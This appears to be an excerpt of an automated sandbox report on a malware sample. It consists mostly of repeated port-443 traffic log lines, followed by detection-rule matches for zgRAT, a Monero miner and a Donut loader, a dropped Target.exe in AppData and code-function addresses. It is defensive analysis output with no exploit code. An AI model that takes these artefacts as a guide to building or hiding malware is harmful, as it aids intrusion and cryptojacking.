Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50230
Source: unknown Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50230 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown Network traffic detected: HTTP traffic on port 49903 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49900
Source: unknown Network traffic detected: HTTP traffic on port 49888 -> 443
Source: unknown HTTPS traffic detected: 40.126.29.9:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49786 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.29.9:443 -> 192.168.2.4:49952 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:50019 version: TLS 1.2

System Summary

Source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.zlONcFaXkc.exe.1dfb97d41e0.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.zlONcFaXkc.exe.1dfb9814218.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 20.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 20.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 20.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 1.2.Target.exe.1d0abdfaef0.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 1.2.Target.exe.1d0abdfaef0.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 1.2.Target.exe.1d0abdfaef0.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000002.00000002.2015231668.000002A5B9B80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.1675678511.000001DFC1CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000014.00000002.4110650202.0000000140465000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: Target.exe PID: 7384, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: AddInProcess.exe PID: 7492, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: zlONcFaXkc.exe, Program.cs Large array initialization: Main: array initializer size 642620
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Process Stats: CPU usage > 49%
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Code function: 0_2_00007FFD9B8A1C44 0_2_00007FFD9B8A1C44
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Code function: 0_2_00007FFD9B8A1A51 0_2_00007FFD9B8A1A51
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Code function: 0_2_00007FFD9B8A3FFA 0_2_00007FFD9B8A3FFA
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Code function: 0_2_00007FFD9B971B44 0_2_00007FFD9B971B44
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Code function: 0_2_00007FFD9B973198 0_2_00007FFD9B973198
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Code function: 0_2_00007FFD9BA50140 0_2_00007FFD9BA50140
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9B8D6C22 1_2_00007FFD9B8D6C22
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9B8D5979 1_2_00007FFD9B8D5979
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9B8E1890 1_2_00007FFD9B8E1890
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9B8B8D50 1_2_00007FFD9B8B8D50
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9B8BA2E0 1_2_00007FFD9B8BA2E0
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9B8BE610 1_2_00007FFD9B8BE610
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9B8B8A48 1_2_00007FFD9B8B8A48
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9B8C5F09 1_2_00007FFD9B8C5F09
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9B8D5E76 1_2_00007FFD9B8D5E76
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9B881C45 1_2_00007FFD9B881C45
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9B881A51 1_2_00007FFD9B881A51
